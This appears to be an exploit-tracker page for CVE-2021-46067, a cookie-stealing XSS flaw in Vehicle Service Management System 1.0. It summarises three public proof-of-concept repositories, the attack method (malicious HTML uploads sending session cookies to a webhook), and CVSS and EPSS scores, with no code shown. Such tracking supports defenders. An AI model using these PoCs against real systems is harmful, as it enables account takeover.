CVE-2021-46067

CRITICAL

In Vehicle Service Management System 1.0 - Info Disclosure

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 3 public exploits for CVE-2021-46067. PoCs published by sanupl, plsanu.

AI-analyzed exploit summary This repository provides a functional proof-of-concept for CVE-2021-46067, demonstrating how an attacker can steal cookies via malicious HTML file uploads in the Vehicle Service Management System, leading to full account takeover.

Description

In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.

Exploits (3)

nomisec WORKING POC 1 stars
by sanupl · poc
https://github.com/sanupl/CVE-2021-46067

This repository provides a functional proof-of-concept for CVE-2021-46067, demonstrating how an attacker can steal cookies via malicious HTML file uploads in the Vehicle Service Management System, leading to full account takeover.

Classification
Working Poc 95%
Attack Type
Auth Bypass
Complexity
Trivial
Reliability
Reliable
Target: Vehicle Service Management System 1.0
Auth required
Prerequisites: admin access to the target system · ability to upload files in specific sections
devstral-2 · analyzed May 19, 2026 Full analysis →
nomisec WORKING POC
by sanupl · poc
https://github.com/sanupl/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

This repository provides a functional proof-of-concept for CVE-2021-46067, demonstrating how an attacker can steal cookies via malicious HTML file uploads in the Vehicle Service Management System, leading to full account takeover.

Classification
Working Poc 100%
Attack Type
Xss
Complexity
Trivial
Reliability
Reliable
Target: Vehicle Service Management System 1.0
Auth required
Prerequisites: admin access to the target system · ability to upload files in specific sections (MyAccount, User List, Settings)
devstral-2 · analyzed May 19, 2026 Full analysis →
nomisec WORKING POC
by plsanu · poc
https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

This PoC demonstrates a cookie-stealing vulnerability in Vehicle Service Management System 1.0, leading to full account takeover via malicious HTML file uploads in multiple sections (MyAccount, User List, Settings). The exploit leverages XSS to exfiltrate session cookies to a third-party webhook.

Classification
Working Poc 100%
Attack Type
Xss
Complexity
Trivial
Reliability
Reliable
Target: Vehicle Service Management System 1.0
Auth required
Prerequisites: Admin access to upload malicious HTML files · Victim interaction to trigger the payload
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (2)

Core 2

Scores

CVSS v3 9.8
EPSS 0.0514
EPSS Percentile 91.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Status published
Products (1)
vehicle_service_management_system_project/vehicle_service_management_system < 1.0
Published Jan 06, 2022
Tracked Since Feb 18, 2026